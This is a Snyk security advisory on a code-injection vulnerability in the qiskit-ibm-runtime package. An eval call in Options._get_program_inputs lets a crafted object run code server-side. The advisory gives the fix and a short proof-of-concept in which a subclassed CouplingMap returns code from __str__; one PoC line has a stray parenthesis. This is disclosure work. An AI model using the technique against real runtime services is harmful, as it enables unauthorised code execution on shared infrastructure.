Uncontrolled Recalculation of Data to Code ('Code Injection') Affecting qiskit-ibm-runtime package, versions [0.11.0,0.11.1)
Snyk CVSS
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-QISKITIBMRUNTIME-6475237
- published 21 Mar 2024
- disclosed 20 Mar 2024
- credit ihincks
How to fix?
Upgrade qiskit-ibm-runtime to version 0.11.1 or higher.
Overview
qiskit-ibm-runtime is an IBM Quantum client for Qiskit Runtime.
Affected versions of this package are vulnerable to Uncontrolled Recalculation of Data to Code ('Code Injection') due to the usage of eval method in Options._get_program_inputs. An attacker can execute arbitrary code by using a specifically crafted object that, when processed by the eval method, leads to code execution. This issue arises because Options are used server-side, potentially exposing runtime containers to arbitrary code injection.
PoC
from qiskit import transpiler
class BadActor(transpiler.CouplingMap):
def __str__(self):
return "print('external code')"
from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler
from qiskit import QuantumCircuit
cmap = BadActor.from_line(42)
service = QiskitRuntimeService()
options = Options(optimization_level=1)
options.simulator = dict(coupling_map=cmap))
bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()
with Session(service=service, backend="ibmq_qasm_simulator") as session:
sampler = Sampler(session=session, options=options).run(bell)